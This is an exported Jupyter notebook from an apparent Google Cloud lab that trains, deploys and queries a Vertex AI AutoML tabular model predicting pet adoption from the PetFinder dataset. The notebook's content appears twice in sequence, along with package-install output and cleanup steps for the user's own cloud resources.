Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification.csv"
! gsutil cp gs://cloud-samples-data/ai-platform-unified/datasets/tabular/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-samples-data/ai-platform-unified/datasets/tabular/petfinder-tabular-classification.csv [Content-Type=text/csv]...
/ [1 files][872.8 KiB/872.8 KiB]
Operation completed over 1 objects/872.8 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two hour and half to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projectsshutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewThis tutorial demonstrates how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML Tabular model.* Deploy the `Model` resource to a serving `Endpoint` resource.* Make a prediction by sending data.* Undeploy the `Model` resource. IntroductionThis notebook demonstrates, using the Vertex AI Python client library, how to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification.csv"
! gsutil cp gs://cloud-samples-data/ai-platform-unified/datasets/tabular/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-samples-data/ai-platform-unified/datasets/tabular/petfinder-tabular-classification.csv [Content-Type=text/csv]...
/ [1 files][872.8 KiB/872.8 KiB]
Operation completed over 1 objects/872.8 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce we have defined your training script, we will create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around an hour to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
